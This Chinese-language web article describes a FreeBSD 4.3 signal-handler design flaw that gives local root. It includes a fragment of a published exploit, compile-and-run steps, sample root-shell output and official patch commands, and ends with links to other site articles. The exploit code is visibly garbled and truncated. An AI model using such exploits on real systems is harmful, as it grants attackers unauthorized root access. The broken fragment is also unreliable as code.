本地攻击者利用FreeBSD4.3设计漏洞取得系统特权

所属分类: 实用技巧 / 网络冲浪 阅读数: 1316
收藏 0 赞 0 分享

发现 FreeBSD 4.3 存在一个设计上的漏洞,它允许用户在其它进程中插入 signal handlers。问题出在 rfork(RFPROC|RFSIGSHARE) ,如果子进程 exec() 一个 setuid 程序,然后父进程设置一个 signal handlers,这个 signal handlers 将会在子进程中被复制。发送一个信号给子进程将能导致 signal handlers 被执行。
利用此漏洞,本地攻击者能取得 root 权限。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
-------------vvfreebsd.c----------------------
/}
}
printf("vvfreebsd. Written by Georgi Guninski\n");
printf("shall jump to %x\n",vv1);
if(!(pid=rfork(RFPROC|RFSIGSHARE)))
{
printf("child=%d\n",getpid());
// /usr/bin/login and rlogin work for me. ping gives nonsuid shell
// if(!execl("/usr/bin/rlogin","rlogin","localhost",0))
kill(pid,MYSIG);
printf("done\n");
while(42);
}
...............................
.........................
.............
受影响版本:
FreeBSD 4.3 4.2 4.1 4.0
早期版本也许受影响
解决方案:
尚无
****** 2001-07-14 add by NetDemon(netdemon@20cn.net) ******
测试程序使用方法:
netdemon%gcc -o vvbsd vvbsd.c
netdemon%cp /bin/sh /tmp
netdemon%./vvbsd
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe71
child=61056
login:
login: # done
#
FreeBSD以此作出补丁
方法:
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:42/signal-4.3.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:42/signal-4.3.patch.asc
# cd /usr/src/sys/kern
# patch -p < /path/to/patch
更多精彩内容其他人还在看

为何不能上网浏览网页 但是可以用QQ聊天

为何不能上网浏览网页 但是可以用QQ聊天
收藏 0 赞 0 分享

Internet连接共享上网完全攻略

Internet连接共享上网完全攻略
收藏 0 赞 0 分享

感受狂飙:网络加速的好帮手

感受狂飙:网络加速的好帮手
收藏 0 赞 0 分享

加快Windows 2000访问网上邻居的速度

加快Windows 2000访问网上邻居的速度
收藏 0 赞 0 分享

三招轻松降伏隐形大盗病毒

三招轻松降伏隐形大盗病毒
收藏 0 赞 0 分享

金山反病毒20050108_日报

金山反病毒20050108_日报
收藏 0 赞 0 分享

金山反病毒20050109_日报

金山反病毒20050109_日报
收藏 0 赞 0 分享

金山反病毒20050110_日报

金山反病毒20050110_日报
收藏 0 赞 0 分享

小心!Internet Explorer新漏洞

小心!Internet Explorer新漏洞
收藏 0 赞 0 分享

Microsoft AntiSpyware微软出品的反间谍软件

Microsoft AntiSpyware微软出品的反间谍软件
收藏 0 赞 0 分享
查看更多